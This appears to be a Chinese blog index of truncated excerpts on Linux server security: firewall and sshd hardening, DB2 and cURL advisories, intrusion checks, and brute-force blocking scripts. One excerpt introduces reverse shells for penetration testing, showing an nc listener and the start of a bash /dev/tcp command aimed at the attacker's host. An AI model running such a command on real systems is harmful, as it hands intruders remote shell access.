VPS 好比一个 Internet 上的独立服务器，有 root 权限，有独立 IP，完全暴露在 Internet上，所以用 root 登录 VPS 操作时要特别注意安全问题，这年头无聊的人太多了，如果你对安全问题还有犹豫，抱有我这个小站没人理的想法，那么打开 /var/log/secure 看看...

一、开防火墙，不用的端口都禁止掉 /etc/init.d/iptables start //简单的规则如下所示，具体的大家根据情况自己变通 /sbin/iptables -F /sbin/iptables -A INPUT -p tcp -i vnet0 dport ssh -j ACCEPT /sbin/iptables -A INPUT -p tcp -i vnet0 dport 80 -j...

虽然SSH的设计目的在于安全访问，但它有的功能确实为入侵敞开了大门。不过只要稍作修改，Linux管理员就可以让sshd更加安全。 多数Linux服务器在默认下通过SSH运行Secure Shell Daemon （sshd）进程以便进行远程访问。Linuxsshd是一种简单的方式，允许远程用...

【Reverse shell】也叫反弹shell，是渗透攻击的基本功，如果你找到机会让远端的机器执行你注入的代码，你的代码怎样才能为你生成一个可以交互操作的shell呢? 你可以在本地先用nc启动一个监听进程【nc -l 端口号】 然后在远端执行【bash -i /dev/tcp/你本地的...

发布日期：2014-11-07 更新日期：2014-11-18 受影响系统： IBM DB2 9.x IBM DB2 10.x 描述： BUGTRAQ ID: 71006 CVE(CAN) ID: CVE-2014-6159 IBM DB2是一个大型的商业关系数据库系统。 IBM DB2 9.7－FP10、9.8－FP5、10.5－FP4(Linux, UNIX, Windows)在启用...

发布日期：2014-11-05 更新日期：2014-11-18 受影响系统： cURL cURL 7.17.1－7.38.0 描述： BUGTRAQ ID: 70988 CVE(CAN) ID: CVE-2014-3707 cURL/libcURL是命令行传输文件工具，支持FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE和LDAP。 cURL/libcU...

1 可以得出filename正在运行的进程 #pidof filename 2 可以通过文件或者tcp udp协议看到进程 #fuser -n tcp port 3 可以看文件修改时间，大小等信息 #stat filename 4 看加载模块 #lsmod 5 看rpc服务开放 #rpcinfo -p 6 看网卡是否混杂模式(promiscuous mod)...

我的一台公网服务器，由于网站采取的是双备份策略，所以开放了vsftpd的21端口，近来发现许多人在尝试暴力破解vsftpd和ssh，我随便看了看/var/log/secure日志，显示如下： 118.33.110.52=2834 119.145.254.77=37 121.254.179.199=226 121.88.250.243=35 200.29...

功能：查询一分钟前secure文件，统计访问失败的IP和次数，并把在1分钟内失败5次的IP列入危险susperctip，1分钟内失败10次直接丢给防火墙拦截，并记录在blockip，关于关键词可以根据需求加强下 #!/bin/bash ##Filteringscript ##CreateTime:2012-10-12.17 # t...

从余大神那要过来的ssh和vsftpd防暴力破解脚本,不知道为什么复制51cto blog上的脚本老是报-gt错误,所以在自己blog上共享给需要的人. view source print? 01 #!/bin/bash 02 #Denyhosts For vsftpd and sshd 03 #2012-12-04 04 awk {for(i=1;i=NF;i++){if($i ~...